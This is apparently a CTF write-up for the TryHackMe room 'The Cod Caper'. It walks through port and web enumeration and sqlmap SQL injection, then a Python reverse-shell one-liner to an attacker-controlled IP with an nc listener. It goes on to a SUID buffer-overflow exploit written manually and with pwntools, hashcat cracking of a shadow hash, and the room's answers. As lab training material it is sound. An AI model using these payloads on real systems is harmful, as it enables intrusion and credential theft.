Tryhackme:The Cod Caper

A guided room taking you through infiltrating and exploiting a Linux system.

Intro:

Note: This room expects some basic pen testing knowledge, as I will not be going over every tool in detail that is used. While you can just use the room to follow through, some interest or experiencing in assembly is highly recommended

  1. Help me out! :)

A:no answer need

Host Enumeration:

Recommended Tool — nmap:

Useful flags:

-sC=Runs default scripts on the port, useful for doing basic analysis on the service running on a port
-A=Aggressive mode, go all out and try to get as much information as possible

1.How many ports are open on the target machine?

A:2

2.What is the http-title of the web server?

A: Apache2 Ubuntu Default Page: It works

3.What version is the ssh service?

A:OpenSSH 7.2p2 Ubuntu 4ubuntu2.8

4.What is the version of the web server?

A:Apache/2.4.18

Web Enumeration:

Recommended tool: gobuster,dirbuster,dirb

Useful flags:

1.What is the name of the important file on the server?

A:administrator.php

Web Exploitation:

Recommended Tool: sqlmap

Useful Flags:

-u=Specifies which url to attack
— forms=Automatically selects parameters from <form> elements on the page
— dump=Used to retrieve data from the db once SQLI is found
-a=Grabs just about everything from the db

  1. What is the admin username?

A:pingudad

2.What is the admin password?

A:secretpass

3.How many forms of SQLI is the form vulnerable to?

A:3

Command Execution:

Method 1: nc Reverse shell:

This machine has been outfitted with nc, a tool that allows you to make and receive connections and send data. It is one of the most popular tools to get a reverse shell. Some great places to find reverse shell payloads are highoncoffee and Pentestmonkey

After this you will have to do some additional enumeration to find pingu’s ssh key, or hidden password

Method 2: Hidden passwords:

Assuming my father hasn’t modified since he took over my old PC, I should still have my hidden password stored somewhere,I don’t recall though so you’ll have to find it! find is the recommended tool here as it allows you to search for which files a user specifically owns.

  1. How many files are in the current directory?

A:3

2.Do I still have an account

A:yes

3.What is my ssh password?

The next step is to have a stable shell in the system. I was having trouble using nc, but since python installed, we can use it. From your machine start listening for incoming connections.

nc -nvlp 80

From the webpage we can use the following command to start the shell.

Note Replace “IP_ADDRES” with your IP from TryHackMe.

python2 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP_ADDRES",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

A:pinguapingu

LinEnum:

Methods to get Linenum on the system

Method 1: SCP

Method 2: SimpleHTTPServer

Note: There are numerous ways to do this and the two listed above are just my personal favorites.

Once You have LinEnum on the system, its as simple as running it and looking at the output above once it finishes.

The next task is to use the script LinEnum. We will use ‘scp’ to insert the script in the victim machine.

scp LinEnum.sh pingu@cod:/tmp

Once the script is executable run it.

chmod +x LinEnum.sh
/LinEnum.sh

From the output we can see that there is a strange suid file.

find / -perm -u=s -type f 2>/dev/null

1.What is the interesting path of the interesting suid file

A:/opt/secret/root

pwndbg:

#include "unistd.h"
#include "stdio.h"
#include "stdlib.h"
void shell(){
setuid(1000);
setgid(1000);
system("cat /var/backups/shadow.bak");
}

void get_input(){
char buffer[32];
scanf("%s",buffer);
}

int main(){
get_input();
}

The SUID file seems to expect 32 characters of input, and then immediately exits. This seems to warrant further investigation. Luckily I was practicing binary exploitation back when I was using that PC, so I have tools preinstalled to examine. One of those tools is pwndbg, a plugin for GDB which allows you to better examine binary files.

Run gdb /opt/secret/root and you should see a screen similar to this

This means that pwndbg has successfully been initialized. The next step is to test if anything happens when you send more then 32 characters. To do this type r < <(cyclic 50), that command runs the program and provides 50 characters worth of "cyclic" input.

Cyclic input goes like this: “aaaaaaaabaaacaaadaaaeaaaf” etc. Because it’s in this “cyclic” format, it allows us to better understand the control we have over certain registers, for reasons you are about to see.

Once you run that command you should see something similar to this screen

Now this is where some knowledge of assembly helps. It seems that in this case we’re able to overwrite EIP, which is known as the instruction pointer. The instruction pointer tells the program which bit of memory to execute next, which in an ideal case would have the program run normally. However, since we’re able to overwrite it, we can theoretically execute any part of the program at any time.

Recall the shell function from the source code, if we can overwrite EIP to point to the shell function, we can cause it to execute. This is also where the benefits of cyclic input show themselves. Recall that cyclic input goes in 4 character/byte sequences, meaning we’re able to calculate exactly how many characters we need to provide before we can overwrite EIP.

Luckily cyclic provides this functionality with the -l flag, running cyclic -l {fault address} will tell us exactly how many characters we need to provide we can overwrite EIP.

Running cyclic -l 0x6161616c outputs 44, meaning we can overwrite EIP once we provide 44 characters of input.

That’s all we needed for pre-explotation!

1.Read the above :)

A:no answer need

Binary-Exploitaion: Manually:

What we’re interested in is the hex memory addresses. So from what we know all we have to do is provide 44 characters, and then “0x080484cb” and the shell function should execute, let’s try it!

Note: Modern CPU architectures are “little endian” meaning bytes are backwards. For example “0x080484cb” would become “cb840408”

We can use python to do this, as it allows a nice way of converting.

Method 1 — Manual conversion:

python -c 'print "A"*44 + "\xcb\x84\x04\x08"' will output the payload we want, but it requires manually converting to little endian

Method 2 — Struct:

python -c 'import struct;print "A"*44 + struct.pack("<I",0x080484cb)'

It requires importing a module but struct.pack allows us to automatically convert memory to little endian.

We print 44 random characters(in this case A) and then our memory address in little endian, and shell should execute. This can be tested by piping the output in to the binary

python -c 'print "A"*44 + "\xcb\x84\x04\x08"' | /opt/secret/rootshould provide you with this output.

We did it!

1.Woohoo!

A:no answer need

Binary Exploitation: The pwntools way:

We start off the script with:

from pwn import *
proc = process('/opt/secret/root')

This imports all the utilities from the pwntools library so we can use them in our script, and then creates a process that we can interact with using pwntools functions.

We know that we need the memory address of the shell function, and pwntools provides a way to obtain that with ELF().

ELF allows us to get various memory addresses of important points in our binary, including the memory address of the shell function.

With the ELF addition our script becomes

from pwn import *
proc = process('/opt/secret/root')
elf = ELF('/opt/secret/root')
shell_func = elf.symbols.shell

shell_func holds the memory address of our shell function. Now we need a way to form the payload, luckily pwntools has that to with fit().

fit allows us to form a payload by combining characters and our memory address. To send the payload we can use a method in our proc variable, proc.sendline(), which just sends whatever data we want to the binary. Finally we can use proc.interactive(), to view the full output of the process.

With all that our final exploit script becomes

from pwn import *
proc = process('/opt/secret/root')
elf = ELF('/opt/secret/root')
shell_func = elf.symbols.shell
payload = fit({
44: shell_func # this adds the value of shell_func after 44 characters
})
proc.sendline(payload)
proc.interactive()

Save that to a .py file and run it, and you should get this output:

We did it again!

Even more woohoo!

A:no naswer need

Finishing the job:

Luckily hashcat supports cracking linux password hashes. You can find a list of hashcat modes here and rockyou.txt(a popular wordlist) here (if you don’t already have it on your system)

Recommended tool — Hashcat:

Usage: hashcat {flags} {hashfile} {wordlist}

Useful flags:

-a=Specify attack mode,attack modes can be found in the man page.
-m=Specifies which mode to use, refer back to the list of modes

hashcat -a 0 -m 1800 hash.txt rockyou.txt

1.What is the root password!

A:love2fish

Thankyou:

Further reading:

http://docs.pwntools.com/en/stable/

https://browserpwndbg.readthedocs.io/en/docs/

please everyone join my telegram channel :https://t.me/hackerwheel

please everyone join my youtube channel :https://www.youtube.com/channel/UCl10XUIb7Ka6fsq1Pl7m0Hg

Hackerwheel
Change the world
https://t.me/hackerwheel

CTF-PLAYER, security analyst, Pentesting, vapt, digital forensics